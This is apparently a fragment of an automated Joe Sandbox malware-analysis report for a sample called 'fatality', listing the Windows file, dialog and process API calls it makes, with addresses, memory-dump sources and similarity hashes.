                                                                                                                                                            • Instruction ID: d1809c5cb11e9ad04114fd73955d7a02931ba116f37c29df6037a53a6380ac52
                                                                                                                                                            • Opcode Fuzzy Hash: b5617b791fe7c0fad0594e10101c1b5bacfea90203e32830b91812e5093e5a45
                                                                                                                                                            • Instruction Fuzzy Hash: 0411E971B04209AFDB10DF58D4417ED77E8EF40324F25409AE9089B2F2EB764D44DB40
                                                                                                                                                            APIs
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000001,00000001,?,008EA23A,?,008EA2E9,00000001,00000001,?,?,008EA175,?,00000001,00000000,?,?), ref: 008EA254
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,008EA23A,?,008EA2E9,00000001,00000001,?,?,008EA175,?,00000001,00000000), ref: 008EA280
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile$_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2673547680-0
                                                                                                                                                            • Opcode ID: f183041dc0546d74fed4836e5797e88b073861c9940d0ca0670b383c9c4cb662
                                                                                                                                                            • Instruction ID: 070267c513fbf9dc8b3a7ff37b41c464a725f332b8bbbc07b4533ea060a7c7ec
                                                                                                                                                            • Opcode Fuzzy Hash: f183041dc0546d74fed4836e5797e88b073861c9940d0ca0670b383c9c4cb662
                                                                                                                                                            • Instruction Fuzzy Hash: 2FE092315001689BCF10AB68CC05BD977A8FB1D7E1F048261FE44F3190D770DE44CAA1
                                                                                                                                                            APIs
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FDEEC
                                                                                                                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 008FDF03
                                                                                                                                                              • Part of subcall function 008FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                              • Part of subcall function 008FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                              • Part of subcall function 008FB568: IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                              • Part of subcall function 008FB568: TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                              • Part of subcall function 008FB568: DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate_swprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3251159408-0
                                                                                                                                                            APIs
                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00902BAA
                                                                                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00902BB5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1660781231-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemShowWindow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3351165006-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            APIs
                                                                                                                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,008E9A50,?,?,00000000,?,?,008E8CBC,?), ref: 008E9BAB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E8289
                                                                                                                                                              • Part of subcall function 008E13DC: __EH_prolog.LIBCMT ref: 008E13E1
                                                                                                                                                              • Part of subcall function 008EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008EA598
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog$CloseFind
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506663941-0
                                                                                                                                                            • Opcode ID: 4d31f6cac1e60aa14ab5f4121d5835d869bdca3ab3da22746892e3ef77d8fdd9
                                                                                                                                                            • Instruction ID: d24186e8c6b999f0e1aa5dec2c61f920cb6e4969714fc604781ede4f0a6428ac
                                                                                                                                                            • Opcode Fuzzy Hash: 4d31f6cac1e60aa14ab5f4121d5835d869bdca3ab3da22746892e3ef77d8fdd9
                                                                                                                                                            • Instruction Fuzzy Hash: 8841D6719446989ADB20DBA5CC55AEEB3A8FF12304F4400EAE18EE7192EB705EC4CB11
                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 008E995F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 05a43eb8c8bb41d9623d836baf21e975dd8f4fb58705ce7d863e30d473904088
                                                                                                                                                            • Instruction ID: 495f7f447fcc4e028412d27cf9d2e3d4b03370e918d4db68af4bf2e24d287ab9
                                                                                                                                                            • Opcode Fuzzy Hash: 05a43eb8c8bb41d9623d836baf21e975dd8f4fb58705ce7d863e30d473904088
                                                                                                                                                            • Instruction Fuzzy Hash: 9D311530548385AFE720AB25CC45BEABFE4FB06320F204B19F9E1D61D2D3E49944CB91
                                                                                                                                                            APIs
                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,008ED343,00000001,?,?,?), ref: 008EA011
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                            • Opcode ID: 155915876cdea3549fb88fe7f7b3e296690891e0d42b957bc57a05c37195b9fb
                                                                                                                                                            • Instruction ID: 2efc87f0ce8ff8ac2ddea783f7290c94a2d96b59d4d993538ae838e5142627c3
                                                                                                                                                            • Opcode Fuzzy Hash: 155915876cdea3549fb88fe7f7b3e296690891e0d42b957bc57a05c37195b9fb
                                                                                                                                                            • Instruction Fuzzy Hash: AD31A231208385EFDB18CF25D808BAE77A5FF96B15F044919F581D7290CBB5AD48CBA2
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E13E1
                                                                                                                                                              • Part of subcall function 008E5E37: __EH_prolog.LIBCMT ref: 008E5E3C
                                                                                                                                                              • Part of subcall function 008ECE40: __EH_prolog.LIBCMT ref: 008ECE45
                                                                                                                                                              • Part of subcall function 008EB505: __EH_prolog.LIBCMT ref: 008EB50A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 20bb52fe596e354772744109906a64e7696bd28b4abd4e3009bd46171a67c742
                                                                                                                                                            • Instruction ID: 46b772f4ad876b6c4dee51191e4e79040b6416e150f4309b7e8fb062685df822
                                                                                                                                                            • Opcode Fuzzy Hash: 20bb52fe596e354772744109906a64e7696bd28b4abd4e3009bd46171a67c742
                                                                                                                                                            • Instruction Fuzzy Hash: 31414CB0905B449ED724DF398885AE6FAE5FF19300F50492EE5FEC3282CB316654CB11
                                                                                                                                                            APIs
                                                                                                                                                            • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04936706
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcessUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3902816426-0
                                                                                                                                                            • Opcode ID: 1735bb0fbf0b971dfc84fee1ef2809624d393c64c5af300b9e6477de7ec9172b
                                                                                                                                                            • Instruction ID: c27f87950bc09eb630ea49372c70d2f24a111a450a5c919064bfeaa5f2849cb2
                                                                                                                                                            • Opcode Fuzzy Hash: 1735bb0fbf0b971dfc84fee1ef2809624d393c64c5af300b9e6477de7ec9172b
                                                                                                                                                            • Instruction Fuzzy Hash: 0C3109B6D1060CEFDB10CFD1C844BEEBBB8FB14336F21861AE421A6180D7785A088F60
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008FB098
                                                                                                                                                              • Part of subcall function 008E13DC: __EH_prolog.LIBCMT ref: 008E13E1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 3b9dd14a73236a0db1a79823d8230c40743065e8abb2f0525f915696f044a437
                                                                                                                                                            • Instruction ID: 53537959d406f697acaf2030a7ed48a7c7d4e9eef795cf1e9870fc83f44843f9
                                                                                                                                                            • Opcode Fuzzy Hash: 3b9dd14a73236a0db1a79823d8230c40743065e8abb2f0525f915696f044a437
                                                                                                                                                            • Instruction Fuzzy Hash: 85316A75800249DECF15DFA9C951AFEBBB4FF09304F10449AE409B7282DB35AE44CB62
                                                                                                                                                            APIs
                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 008E9E70
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileTime
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1425588814-0
                                                                                                                                                            • Opcode ID: 0718bd9cf2b0aa7af7d8d252d7d545a55c43d03f6ee5076f0a81eb6fb504150c
                                                                                                                                                            • Instruction ID: f41881700a85d34907336dd8868f59248f8d7fd3384a2cd8df511232ca3b20ca
                                                                                                                                                            • Opcode Fuzzy Hash: 0718bd9cf2b0aa7af7d8d252d7d545a55c43d03f6ee5076f0a81eb6fb504150c
                                                                                                                                                            • Instruction Fuzzy Hash: 8121C131248296EBC714DF36C895AAABBE8FF96304F08491CF4C5C7141D3A9D90CDB62
                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,008E9F27,?,?,008E771A), ref: 008E96E6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: baad8b2dca31810f13b1a3e66e50a83b0c35b7d53733d1e2cd68cb9290863b86
                                                                                                                                                            • Instruction ID: 3552c6a54f666dac2d8daf6d4e2e5b5f4cf17a1cb28fd7810c50fe485ba16bf9
                                                                                                                                                            • Opcode Fuzzy Hash: baad8b2dca31810f13b1a3e66e50a83b0c35b7d53733d1e2cd68cb9290863b86
                                                                                                                                                            • Instruction Fuzzy Hash: 9021B0715043846EE3709A6ACC89BF777ECFB5A324F104A19FAD5C21E1C7B4A884D631
                                                                                                                                                            APIs
                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,008E9C22,?,?,00000000,00000800,?), ref: 008E97AD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                            • Opcode ID: e1ce323b457b0b9fc3333a8996cbb041fbcd2c0de1b98907b482e8842b4fa1cc
                                                                                                                                                            • Instruction ID: cff8b1c37ea52c476b476a9d921e8ad16ecc4440d8779626fcfd7d0a623030ea
                                                                                                                                                            • Opcode Fuzzy Hash: e1ce323b457b0b9fc3333a8996cbb041fbcd2c0de1b98907b482e8842b4fa1cc
                                                                                                                                                            • Instruction Fuzzy Hash: 07117030924268EBDF209F67CC046A937B9FB47364F10C539E496C51A0E7F49E48DB61
                                                                                                                                                            APIs
                                                                                                                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 008E9EC7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                            • Opcode ID: 47b24e939f13dee7181f7577d80d7926f0e8611c561f484dafc8f67986943754
                                                                                                                                                            • Instruction ID: 14f883757aa7641d95f5a8ff7be2bf8feaceccb74b072012d7fde3a86d60c819
                                                                                                                                                            • Opcode Fuzzy Hash: 47b24e939f13dee7181f7577d80d7926f0e8611c561f484dafc8f67986943754
                                                                                                                                                            • Instruction Fuzzy Hash: A211C230604785EBD734C62ACC40BA6B7E8FB46370F504A29E292D26D0E7F0ED45C660
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EC27E: _wcslen.LIBCMT ref: 008EC284
                                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,008EA175,?,00000001,00000000,?,?), ref: 008EA2D9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateDirectory_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2011010700-0
                                                                                                                                                            • Opcode ID: 656635d7272f56643f5058782f68a6ca3512cdfa025822bf5d178b7bbf0bf658
                                                                                                                                                            • Instruction ID: e47444e3bb478446514b5a3c41e806370d248f589bdb50175676747c2a75d5c4
                                                                                                                                                            • Opcode Fuzzy Hash: 656635d7272f56643f5058782f68a6ca3512cdfa025822bf5d178b7bbf0bf658
                                                                                                                                                            • Instruction Fuzzy Hash: 1801D831610294AAEF29AB774C09BFD3398FF0BF80F048414F902E6191D754EA81D6B7
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 5242fb9d333b78285b3d933da089480f4d8cc523a4f870a6d812aa028e6411cc
                                                                                                                                                            • Instruction ID: 800f66da20855ffcfdd7bb005334cbd569dfd6fd2ff1f0ef213e11e2ca4eb7ca
                                                                                                                                                            • Opcode Fuzzy Hash: 5242fb9d333b78285b3d933da089480f4d8cc523a4f870a6d812aa028e6411cc
                                                                                                                                                            • Instruction Fuzzy Hash: 5601A5339005A8ABCF21ABADCC819DEB736FF8A750F014115E922F7212DA748D04C6A2
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E5AC2
                                                                                                                                                              • Part of subcall function 008EB505: __EH_prolog.LIBCMT ref: 008EB50A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 72b42953c1c5621dbd853fc3b3026c8dcd7ef62789401fceb10d716535d1c334
                                                                                                                                                            • Instruction ID: e040d44fe2c01dc4c7c02a4048ca7c701ef9601125959a2fbedcaece97746b7b
                                                                                                                                                            • Opcode Fuzzy Hash: 72b42953c1c5621dbd853fc3b3026c8dcd7ef62789401fceb10d716535d1c334
                                                                                                                                                            • Instruction Fuzzy Hash: DF014630910798DED725E7B8C0517EDBBA4EB65304F50848DA556A3283CBB82B08DAA3
                                                                                                                                                            APIs
                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,008EA325,00000001,008E70E6,?,008EA175,?,00000001,00000000,?,?), ref: 008EA501
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2048169685-0
                                                                                                                                                            • Opcode ID: a55233ce9b9086b6ee42bf78023d7daee8ed4c09f0dea48c0e003a5f0ba58e69
                                                                                                                                                            • Instruction ID: 4d07431577e1a5aa8bb49f8f00b855a178a7e713ab122a50fcf17b3778c8a908
                                                                                                                                                            • Opcode Fuzzy Hash: a55233ce9b9086b6ee42bf78023d7daee8ed4c09f0dea48c0e003a5f0ba58e69
                                                                                                                                                            • Instruction Fuzzy Hash: A5F0A932210249BBDF015FA1DC01FEA3BACFF0A785F488060B948E6160DB31DA98EA10
                                                                                                                                                            APIs
                                                                                                                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,008E977F,?,?,008E95CF,00000000,00912641,000000FF), ref: 008EA1F1
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteFile_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3339486230-0
                                                                                                                                                            • Opcode ID: 8c4c614a528b6ce6a97657b81786e04f41bc831ed64edde555b0e5d21199d48b
                                                                                                                                                            • Instruction ID: ef8621fe4d8829e93b9847a3a308d3498e350710e6ae249933d8738b088fad8c
                                                                                                                                                            • Opcode Fuzzy Hash: 8c4c614a528b6ce6a97657b81786e04f41bc831ed64edde555b0e5d21199d48b
                                                                                                                                                            • Instruction Fuzzy Hash: 48E0D8312502496BDB015F66DC45FEA37ACFF0D7C1F488021BA44E2060EB71DEC4EA61
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,008EA592,000000FF,?,?), ref: 008EA6C4
                                                                                                                                                              • Part of subcall function 008EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,008EA592,000000FF,?,?), ref: 008EA6F2
                                                                                                                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008EA598
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Find$FileFirst$Close
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2810966245-0
                                                                                                                                                            • Opcode ID: 4d1d520d5f2a68fdb69c5514c35ac93a48db8f3dec1fcec471008f57f607b0f9
                                                                                                                                                            • Instruction ID: 7d61482b58aad3c4b5dfe7f5b6097fa06b19ac91011b22c239696a8bf0c5e44c
                                                                                                                                                            • Opcode Fuzzy Hash: 4d1d520d5f2a68fdb69c5514c35ac93a48db8f3dec1fcec471008f57f607b0f9
                                                                                                                                                            • Instruction Fuzzy Hash: AFF082310087D0AACB6657F98904BCB7BE0BF1B731F14CA49F1FDA21A6C27560949B23
                                                                                                                                                            APIs
                                                                                                                                                            • 735A6BB0.GDIPLUS(00000010), ref: 008FA62C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            APIs
                                                                                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 008FDD92
                                                                                                                                                              • Part of subcall function 008FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                              • Part of subcall function 008FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                              • Part of subcall function 008FB568: IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                              • Part of subcall function 008FB568: TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                              • Part of subcall function 008FB568: DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 897784432-0
                                                                                                                                                            APIs
                                                                                                                                                            • GetFileType.KERNELBASE(?,008E97BE), ref: 008E98C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                            APIs
                                                                                                                                                            • SetEndOfFile.KERNELBASE(?,008E903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 008E9F0C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 749574446-0
                                                                                                                                                            APIs
                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 008FAC08
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1611563598-0
                                                                                                                                                            APIs
                                                                                                                                                            • CloseHandle.KERNELBASE(000000FF,?,?,008E95D6,00000000,00912641,000000FF), ref: 008E963B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                            APIs
